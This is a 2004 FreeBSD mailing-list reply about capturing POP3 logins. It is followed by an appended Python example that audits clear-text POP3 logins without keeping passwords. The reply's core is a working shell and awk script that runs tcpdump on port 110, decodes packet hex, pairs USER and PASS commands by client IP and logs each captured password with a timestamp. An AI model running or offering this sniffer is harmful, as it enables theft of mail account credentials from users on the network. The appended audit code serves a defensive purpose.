Re: tcpdump for sniffing POP3 -- methods ?

freebsd-lists_at_albury.net.au
Date: 04/13/04

    Date: Wed, 14 Apr 2004 06:10:49 +1000 (EST)
    To: John Fox <readbsd@mind.net>
    
    

    On Tue, 13 Apr 2004, John Fox wrote:

    > 2) Obtain them by sniffing the POP3 traffic being sent
    > to the Imail server.
    >
    > I think #2 is the only possibility, and I haven't made much
    > use of tcpdump, so while I do know how to run it and
    > specify a host to listen to, I've no idea how to isolate
    > the clear-text stuff (containing the usernames and passwords)
    > from all the other traffic.
    >
    > Any suggestions would be greatly appreciated.

    I had to do this some years back, here's the rude, crude and unattractive
    script I wrote then:

    # cat sniff.pop.passwords

    #! /bin/sh

    log=sniffed.passwords.log
    mailhost="mail" # Hostname of whichever host receives your incoming mail

    tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk '
            BEGIN{ lut="123456789abcdef" }
            />/ { IP=$2; n=0; len=0; c=""; }
            {
                if(n==1) for(x=1; x<=4; x++) len=len*16+index(lut,substr($2,x,1));
                if(++n>3 && len>20)
                {
                    for(i=(n==4)*4+1; i<=NF; i++)
                    c=sprintf("%s%c%c",c,
                            index(lut,substr($i,1,1))*16+index(lut,substr($i,2,1)),
                            index(lut,substr($i,3,1))*16+index(lut,substr($i,4,1)))
                    if(length(c) >= len-40)
                    {
                            sub("\.[0-9]*$","",IP);
                            v=substr(c,6); gsub("[^a-zA-Z0-9]","",v)
                            if(substr(c,1,5)=="USER ") usr[IP]=v;
                            if(substr(c,1,5)=="PASS " && usr[IP]) {
                                    printf("%s %-16.16s %10s - %s\n", strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v);
                                    usr[IP]=""
                            }
                    }
                }
            }'

    _______________________________________________
    freebsd-isp@freebsd.org mailing list
    http://lists.freebsd.org/mailman/listinfo/freebsd-isp
    To unsubscribe, send any mail to "freebsd-isp-unsubscribe@freebsd.org"
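An added example, not from this thread, that applies the same USER/PASS pairing from the mail admin's auditing side: given decoded client commands (a constructed sample; the tab-separated "ip<TAB>command" layout is an assumption, not a tcpdump format), it reports which clients still log in clear-text on port 110 so they can be moved to STLS, POP3S or APOP, and never records the password.

```python
# Detect clear-text POP3 logins from decoded client commands: the same
# USER/PASS pairing as the awk script above, but for the mail admin's audit.
# It reports which clients still authenticate in the clear on port 110 and
# never records the password itself.
import re
from collections import defaultdict

# One decoded client command per line, "client-ip<TAB>command". Constructed
# sample; the tab-separated layout is an assumption, not a tcpdump format.
# After STLS a sniffer sees only TLS bytes, so no USER/PASS follows it here.
SAMPLE = """\
192.0.2.10\tUSER alice
192.0.2.10\tPASS hunter2
192.0.2.11\tSTLS
192.0.2.12\tAPOP carol 0123abcd
192.0.2.10\tUSER alice
192.0.2.10\tPASS hunter2
"""

CMD_RE = re.compile(r"^(?P<ip>[\d.]+)\t(?P<verb>[A-Za-z]+)\s*(?P<arg>.*)$")

def audit_pop3(text):
    """Return (ip, user, method) for every login or STLS seen; method is
    'cleartext' (USER/PASS), 'apop' (challenge-response) or 'stls'."""
    pending_user = {}   # ip -> username waiting for its PASS, as in the awk
    findings = []
    for line in text.splitlines():
        m = CMD_RE.match(line)
        if not m:
            continue
        ip, verb, arg = m.group("ip"), m.group("verb").upper(), m.group("arg").strip()
        if verb == "STLS":
            findings.append((ip, "", "stls"))
        elif verb == "USER":
            pending_user[ip] = arg
        elif verb == "PASS" and ip in pending_user:
            # record the fact of a clear-text login, discard the password
            findings.append((ip, pending_user.pop(ip), "cleartext"))
        elif verb == "APOP":
            findings.append((ip, arg.split()[0] if arg else "", "apop"))
    return findings

def cleartext_clients(findings):
    """Client IPs still logging in clear-text, with the usernames they sent."""
    out = defaultdict(set)
    for ip, user, method in findings:
        if method == "cleartext":
            out[ip].add(user)
    return dict(out)
```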

